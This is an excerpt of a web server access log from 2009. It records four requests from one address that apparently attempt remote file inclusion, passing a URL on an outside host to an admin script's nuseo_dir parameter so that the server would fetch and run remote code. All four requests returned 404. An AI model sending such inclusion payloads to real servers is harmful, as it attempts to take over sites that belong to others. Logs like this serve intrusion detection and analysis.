206.225.23.4 - - [16/Sep/2009:11:59:31 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:31 -0700] "GET /logs/access_090527.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:31 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:32 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
